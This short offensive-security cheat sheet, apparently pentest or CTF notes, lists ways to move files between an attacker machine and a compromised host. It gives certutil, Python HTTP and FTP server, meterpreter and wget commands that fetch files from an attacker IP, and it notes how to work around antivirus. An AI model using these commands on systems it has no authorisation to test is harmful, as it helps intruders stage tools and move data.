There are several tools we can use to transfer files between the compromised machine and ourselves.
1. `certutil`: If the target machine is windows based we can use the `certutil` command to download files from an endpoint.
eg: `certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt`
2. `HTTP`: We can host an HTTP server on our machine using python to host files to be downloaded
eg: `python -m SimpleHTTPServer 80`
3. `FTP`: If we cannot use `certutil` for some reason such as being blocked by an antivirus, we can connect to a `FTP` on the attacker machine from the compromised machine.
Attacker: `python -m pyftpdlib 21`
Compromised: `ftp 10.10.10.10`
4. `Metasploit`: If we have a meterpreter session, we can use the `upload` and `download` commands available to transfer files.
5. `Browser`: We can also use the web browser to navigate to our server and download the file from there directly
6. `wget`: In Linux, we can use the available `wget` command to download a resource with a URL